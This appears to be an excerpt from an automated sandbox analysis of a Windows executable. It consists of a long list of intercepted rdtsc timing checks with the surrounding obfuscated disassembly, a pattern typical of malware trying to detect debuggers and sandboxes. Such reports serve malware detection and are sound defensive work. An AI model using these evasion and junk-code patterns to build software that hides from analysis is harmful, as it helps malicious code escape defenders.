                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD99 second address: 47DD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF08 second address: 47DF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF0C second address: 47DF27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5E60CAC68Ch 0x0000000c jns 00007F5E60CAC686h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF27 second address: 47DF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF2D second address: 47DF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4B4 second address: 47E4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5E60BA166Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4DA second address: 47E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4E0 second address: 47E4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF23 second address: 47EF31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5E60CAC68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF31 second address: 47EF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5E60BA1656h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF40 second address: 47EF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF61 second address: 47EF65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F0E4 second address: 47F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F0EA second address: 47F114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E60BA1665h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F5E60BA165Ch 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F259 second address: 47F25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F358 second address: 47F35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F35E second address: 47F379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5E60CAC692h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F459 second address: 47F45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F6DC second address: 47F701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC690h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 480119 second address: 480138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5E60BA165Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60BA1656h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 480138 second address: 480142 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4802C0 second address: 4802C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4802C4 second address: 4802EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov si, 083Dh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481286 second address: 4812C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D2B19h], ecx 0x0000000e mov dword ptr [ebp+122D20D4h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F5E60BA1658h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov di, ax 0x00000033 push 00000000h 0x00000035 mov si, cx 0x00000038 xchg eax, ebx 0x00000039 push edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push edi 0x0000003d pop edi 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482CD9 second address: 482CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E60CAC686h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837AB second address: 4837B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5E60BA1656h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837B5 second address: 4837C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F5E60CAC686h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837C8 second address: 4837CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432579 second address: 43257D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48797A second address: 48799A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E60BA1668h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48799A second address: 48799E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4883B8 second address: 4883C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E60BA1656h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488168 second address: 48818E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F5E60CAC68Ch 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C8D5 second address: 48C8DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D8D9 second address: 48D960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60CAC699h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F5E60CAC688h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jnp 00007F5E60CAC68Ch 0x00000030 adc ebx, 32BDC50Ah 0x00000036 push 00000000h 0x00000038 je 00007F5E60CAC689h 0x0000003e movsx edi, bx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F5E60CAC688h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d xchg eax, esi 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8CB second address: 48E8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8E6 second address: 48E8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8EA second address: 48E8EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA73 second address: 48EA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FA99 second address: 48FAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E60BA165Bh 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA77 second address: 48EA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49090D second address: 490911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FAAE second address: 48FAB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA7D second address: 48EA96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5E60BA1656h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jng 00007F5E60BA1660h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FB60 second address: 48FB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EB56 second address: 48EB6B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA1656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F5E60BA1664h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490AAE second address: 490AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FB64 second address: 48FB7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1666h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EB6B second address: 48EB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492BDF second address: 492BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490AB4 second address: 490AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492BE3 second address: 492BE9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492BE9 second address: 492BEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490B57 second address: 490B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490B5D second address: 490B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493BED second address: 493BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492DF9 second address: 492E07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 492E07 second address: 492E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4969CF second address: 4969D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4969D3 second address: 4969D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4969D9 second address: 496A79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5E60CAC694h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F5E60CAC688h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov bx, cx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F5E60CAC688h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 call 00007F5E60CAC694h 0x0000004e mov ebx, dword ptr [ebp+122D3737h] 0x00000054 pop ebx 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F5E60CAC696h 0x0000005d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497936 second address: 497958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497958 second address: 49797E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E60CAC68Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc bx, 66ADh 0x00000010 push 00000000h 0x00000012 mov bh, 5Eh 0x00000014 push 00000000h 0x00000016 sbb bh, 00000000h 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ebx 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4989AB second address: 498A0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E60BA1658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F5E60BA1658h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 call 00007F5E60BA165Ch 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D253Ah], edi 0x00000037 xchg eax, esi 0x00000038 ja 00007F5E60BA1662h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498A0A second address: 498A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC690h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499837 second address: 499852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5E60BA1656h 0x00000009 jc 00007F5E60BA1656h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499852 second address: 499859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498B42 second address: 498B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498BF9 second address: 498C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F5E60CAC695h 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4999F9 second address: 499A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B9F6 second address: 49BA00 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BA00 second address: 49BA54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60BA1658h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, cx 0x00000012 push 00000000h 0x00000014 sub di, D8D0h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F5E60BA1658h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xor ebx, dword ptr [ebp+122D202Eh] 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5E60BA1660h 0x00000044 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AABA second address: 49AABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BA54 second address: 49BA76 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E60BA1666h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BA76 second address: 49BA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449EA9 second address: 449EE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5E60BA1665h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5E60BA1664h 0x00000011 jne 00007F5E60BA1656h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449EE1 second address: 449EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jo 00007F5E60CAC686h 0x0000000c je 00007F5E60CAC686h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449EFB second address: 449F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007F5E60BA165Fh 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BD26 second address: 49BD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5E60CAC686h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449F17 second address: 449F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1669h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5E60BA1662h 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 449F49 second address: 449F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5E60CAC686h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441A38 second address: 441A40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5B52 second address: 4A5B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E60CAC68Ah 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E60CAC699h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E1DD second address: 43E1F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E1F0 second address: 43E206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC68Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
